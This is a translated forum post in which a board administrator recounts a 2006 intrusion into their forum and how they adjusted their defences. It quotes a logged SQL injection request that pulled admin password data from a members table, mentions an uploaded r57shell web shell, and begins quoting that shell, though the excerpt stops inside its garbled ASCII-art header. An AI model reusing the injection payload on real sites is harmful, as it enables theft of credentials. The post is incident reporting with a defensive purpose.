TRANSLATED BY =TEG=Rastah Rapid
THX
This actually is some tough stuff!
Here a summary about my adjusted defenses:
Exploiting 2 security holes our board has been attacked on the 01-02-2006.
The attacker had through entering
Code /index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20tegib_members%20Where%20id=1/* HTTP/1.1" 200 34262 "-" "-"
acces to the adminpasswords.
Using those he changed the skinfile, as shown below:
At the same time(which I just noticed yesterday) he also uploaded a
get.php into the directory html/emotions/. This file is a r57shell.
With this shell, which is about 87,3 kb big, he would have gained
complete acces to the webspace. Check also: Mambo gehackt.
Code
< ?php
/**********************************************************************
********************************/
/*
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? # ? ?# ? ? ? ?# ? ?#
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? # ? # ? ? ? ? ?# ? #
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?# ? ?# ? ? ? ? ?# ? ?#
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?# ? ## ? #### ? ## ? #
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ## ? ## ?###### ?## ? ##
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ## ? ## ?###### ?## ? ##
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ## ? ## ? #### ? ## ? ##
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ### ? ############ ? ###
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ########################
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?##############
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ######## ########## #######
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?### ? ## ?########## ?## ? ###
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?### ? ## ?########## ?## ? ###
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ### ? # ?########## ?# ? ###
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ### ? ## ?######## ?## ? ###
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?## ? ?# ? ###### ? # ? ?##
/* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ##
